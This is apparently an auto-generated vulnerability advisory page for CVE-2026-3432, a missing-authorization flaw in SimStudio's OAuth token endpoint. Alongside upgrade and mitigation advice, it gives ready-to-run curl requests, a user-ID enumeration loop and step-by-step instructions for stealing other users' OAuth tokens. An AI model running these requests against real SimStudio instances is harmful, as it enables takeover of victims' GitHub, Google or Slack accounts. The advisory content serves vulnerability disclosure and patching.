SimStudio, Missing Authorization, CVE-2026-3432 (CRITICAL)

Listen to this Post

The vulnerability exists in SimStudio versions before 0.5.74 due to a missing authorization check in the OAuth token handling logic. The `/api/auth/oauth/token` endpoint contains a specific code path designed to retrieve existing access tokens for connected third-party services. When an HTTP request is made to this endpoint and includes both the `credentialAccountUserId` (the target user’s internal ID) and the `providerId` (e.g., “google”, “github”, “slack”) parameters, the application fails to verify the requester’s identity or permissions. It directly uses these user-supplied parameters to query the database and returns the corresponding OAuth access token. Because the endpoint does not require any authentication, session token, or API key, any unauthenticated attacker with network access to the SimStudio instance can enumerate user IDs and provider names. By brute-forcing or guessing these values, the attacker can steal valid OAuth tokens, which can then be used to access the linked third-party services as the victim, effectively compromising those external accounts.

DailyCVE Form:

Platform: SimStudio
Version: < 0.5.74
Vulnerability : Missing Authorization
Severity: CRITICAL
date: 03/02/2026

Prediction: 03/02/2026

What Undercode Say:

Analytics:

  • EPSS Probability: 5.5% (High)
  • CISA KEV: No
  • Automatable: Yes
  • Technical Impact: Total (Complete account takeover of linked services)
  • CWE: CWE-862

Commands:

Example using curl to exploit the vulnerability
Assumes target SimStudio instance at http://target-simstudio.local:3000
Attempt to steal OAuth token for user ID "user_123" with provider "github"
curl -X POST http://target-simstudio.local:3000/api/auth/oauth/token \
-H "Content-Type: application/json" \
-d '{
"credentialAccountUserId": "user_123",
"providerId": "github"
}'
The server responds with the OAuth token if the user ID and provider are valid
Expected response format: {"access_token":"gho_16...", "token_type":"bearer", "scope":"..."}
Looping through potential user IDs
for user_id in user_1 user_2 user_123 admin_; do
curl -s -X POST http://target-simstudio.local:3000/api/auth/oauth/token \
-H "Content-Type: application/json" \
-d "{\"credentialAccountUserId\":\"$user_id\", \"providerId\":\"github\"}"
done

How Exploit:

1. Identify a target running SimStudio < 0.5.74.

  1. Obtain or guess a valid internal user ID (often found in API responses, logs, or common patterns like `user_` + number, email hashes, or MongoDB ObjectIds).
  2. Identify supported OAuth providers (enumerated via client-side JavaScript or documentation).
  3. Send a POST request to `/api/auth/oauth/token` with the `credentialAccountUserId` and `providerId` JSON payload.
  4. Receive and capture the OAuth access token from the response.
  5. Use the stolen token to impersonate the victim on the third-party service.

Protection from this CVE:

  • Upgrade to SimStudio version 0.5.74 or later.
  • Apply the official patch from the vendor (Tenable Research Advisory TRA-2026-13).
  • As a workaround, implement a reverse proxy rule (e.g., Nginx, Apache) to block POST requests to `/api/auth/oauth/token` from untrusted IPs until patching is possible.
  • Enforce strict network segmentation to limit access to the SimStudio API.

Impact:

  • Complete compromise of user accounts on integrated third-party platforms (GitHub, Google, Slack, etc.).
  • Unauthorized access to sensitive data stored in those third-party services.
  • Potential lateral movement into connected enterprise environments via compromised service accounts.
  • Reputational damage and legal liability due to data breach.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top